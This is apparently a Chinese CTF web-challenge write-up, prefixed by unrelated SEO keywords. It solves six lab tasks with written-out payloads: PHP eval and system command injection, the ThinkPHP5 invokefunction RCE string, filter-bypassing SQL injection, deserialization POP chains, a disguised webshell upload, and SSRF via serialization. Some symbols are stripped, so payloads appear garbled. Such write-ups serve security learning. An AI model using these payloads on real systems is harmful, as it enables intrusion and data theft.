苏州规划建设局网站,wordpress如何添加商桥, 最新版地址在线,沈阳免费网站制作目录
①webdog1__start
②ez_rce
③ez_sql
④ez_1zpop
⑤file_maste
⑥Power! 挑了部分题#xff0c;太简单的就没选进来#xff08;但选进来≠有难度#xff09;
①webdog1__start 进来没啥东西#xff0c;右键查看源码 对于0e215962017#xff0c;md5后也是以…目录
①webdog1__start
②ez_rce
③ez_sql
④ez_1zpop
⑤file_maste
⑥Power! 挑了部分题太简单的就没选进来但选进来≠有难度
①webdog1__start 进来没啥东西右键查看源码 对于0e215962017md5后也是以0e开头
?web0e215962017
跳转到/start.php 没啥信息这里bp抓包看响应头发现hint 访问/f14g.php 继续抓包发现hint(意义何在) 访问/F1l1l1l1l1lag.php /F1l1l1l1l1lag.php?getsystem(ls);
因为有长度限制所以我们尝试转接
/F1l1l1l1l1lag.php?geteval($_GET[1]);1system(tac flag.php);
回显 就是说flag在/flag里呗
/F1l1l1l1l1lag.php?geteval($_GET[1]);1system(tac /flag);
拿到flag ②ez_rce
进来先灵魂发问 懒得扫目录了直接访问/robots.txt 访问/NSS/index.php/ 惊了是TP5
直接检索thinkphp5 漏洞原理分析合集
?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]ls /flag ?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]tac /flag/flag
?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]ls /flag/flag
均无回显
?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]printenv
看环境变量 确定flag不在该文件下了
?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]find / -name flag* ?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]tac /nss/ctf/flag/flag /flag /flag
拿到flag 或者其实这类框架漏洞利用的题都是有相应工具能梭的 ③ez_sql 提示用post传参
简单测了一下过滤了空格注释符绕过union,or,and双写绕过即可
nss1/**/oorrder/**/by/**/4#
nss999/**/ununionion/**/select/**/1,2,3# 999/**/ununionion/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schemadatabase()),3# 999/**/ununionion/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schemadatabase()/**/aandnd/**/table_nameNSS_tb),3# 999/**/ununionion/**/select/**/1,(select/**/group_concat(Secr3t,flll444g)/**/from/**/NSS_tb),3# ④ez_1zpop
?php
error_reporting(0);
class dxg
{function fmm(){return nonono;}
}class lt
{public $impohi;public $md51weclome;public $md52to NSS;function __construct(){$this-impo new dxg;}function __wakeup(){$this-impo new dxg;return $this-impo-fmm();}function __toString(){if (isset($this-impo) md5($this-md51) md5($this-md52) $this-md51 ! $this-md52)return $this-impo-fmm();}function __destruct(){echo $this;}
}class fin
{public $a;public $url https://www.ctfer.vip;public $title;function fmm(){$b $this-a;$b($this-title);}
}if (isset($_GET[NSS])) {$Data unserialize($_GET[NSS]);
} else {highlight_file(__file__);
}
这个甚至不用搓链子只要绕过一个wake_up就可以
echo $this可以直接触发__toString
构造
$bnew fin();
$anew lt();
$a-impo$b;
$b-asystem;
$b-titletac /flag;
$a-md51s878926199a;
$a-md52s155964671a;
echo serialize($a);最终payload:
?NSSO:2:lt:4:{s:4:impo;O:3:fin:3:{s:1:a;s:6:system;s:3:url;s:21:https://www.ctfer.vip;s:5:title;s:9:tac /flag;}s:4:md51;s:11:s878926199a;s:4:md52;s:11:s155964671a;} ⑤file_master
进来页面可以读文件可以传文件 ?filenameindex.php看源码 MIME检测文件头检测文件内容检测
改Content-Type: image/jpeg
文件头
#define height 1 #define width 1
php用短标签即可 访问 /upload/hggmm3ekc10fc6arlp5d03oamr/yjh3.php
下略 ⑥Power! 右键查看源码发现提示 ?sourceindex.php
看index.php源码
?phpclass FileViewer{public $black_list flag;public $local http://127.0.0.1/;public $path;public function __call($f,$a){$this-loadfile();}public function loadfile(){if(!is_array($this-path)){if(preg_match(/.$this-black_list./i,$this-path)){$file $this-curl($this-local.cheems.jpg);}else{$file $this-curl($this-local.$this-path);}}else{$file $this-curl($this-local.cheems.jpg);}echo img srcdata:jpg;base64,.base64_encode($file)./;}public function curl($path){$url $path;$curl curl_init();curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_HEADER, 0);$response curl_exec($curl);curl_close($curl);return $response;}public function __wakeup(){$this-local http://127.0.0.1/;}}class Backdoor{public $a;public $b;public $superhacker hacker.jpg;public function goodman($i,$j){$i-$j $this-superhacker;}public function __destruct(){$this-goodman($this-a,$this-b);$this-a-c();}}if(isset($_GET[source])){highlight_file(__FILE__);}else{if(isset($_GET[image_path])){$path $_GET[image_path]; //flag in /flag.phpif(is_string($path)!preg_match(/http:|gopher:|glob:|php:/i,$path)){echo img srcdata:jpg;base64,.base64_encode(file_get_contents($path))./;}else{echo h2Seriously??/h2img srcdata:jpg;base64,.base64_encode(file_get_contents(cheems.jpg))./;}}else if(isset($_GET[path_info])){$path_info $_GET[path_info];$FV unserialize(base64_decode($path_info));$FV-loadfile();}else{$path vergil.jpg;echo h2POWER!!/h2img srcdata:jpg;base64,.base64_encode(file_get_contents($path))./;}}
? ?image_pathflag.php
点开echo的链接 flag被放在了 127.0.0.1:65500 外网无法访问
看来要用SSRF了
搓链子
FileViewer - Backdoor::__destruct() - FileViewer::__call() - FileViewer::loadfile() - FileViewer::curl()
注意程序在 unserialize 之后会调用 $FV-loadfile();, 如果 $FV 不是 FileViewer 类的实例则会抛出异常, 导致 Backdoor 类的 __destruct 不会成功执行 解决方法就是再实例化一个 FileViewer 对象 将 Backdoor 塞进这个对象的某个属性里 (php 可以反序列化出不存在的属性)
构造
?php
class FileViewer{public $local http://127.0.0.1:65500/;public $path ;
}class Backdoor{public $a;public $b;public $superhacker;
}$y new FileViewer();
$x new Backdoor();
$x-a $y;
$x-b local;
$x-superhacker http://127.0.0.1:65500/;
$z new FileViewer();
$z-test $x;
echo base64_encode(serialize($z));
payload:
?path_infoTzoxMDoiRmlsZVZpZXdlciI6Mzp7czo1OiJsb2NhbCI7czoyMzoiaHR0cDovLzEyNy4wLjAuMTo2NTUwMC8iO3M6NDoicGF0aCI7czowOiIiO3M6NDoidGVzdCI7Tzo4OiJCYWNrZG9vciI6Mzp7czoxOiJhIjtPOjEwOiJGaWxlVmlld2VyIjoyOntzOjU6ImxvY2FsIjtzOjIzOiJodHRwOi8vMTI3LjAuMC4xOjY1NTAwLyI7czo0OiJwYXRoIjtzOjA6IiI7fXM6MToiYiI7czo1OiJsb2NhbCI7czoxMToic3VwZXJoYWNrZXIiO3M6MjM6Imh0dHA6Ly8xMjcuMC4wLjE6NjU1MDAvIjt9fQ
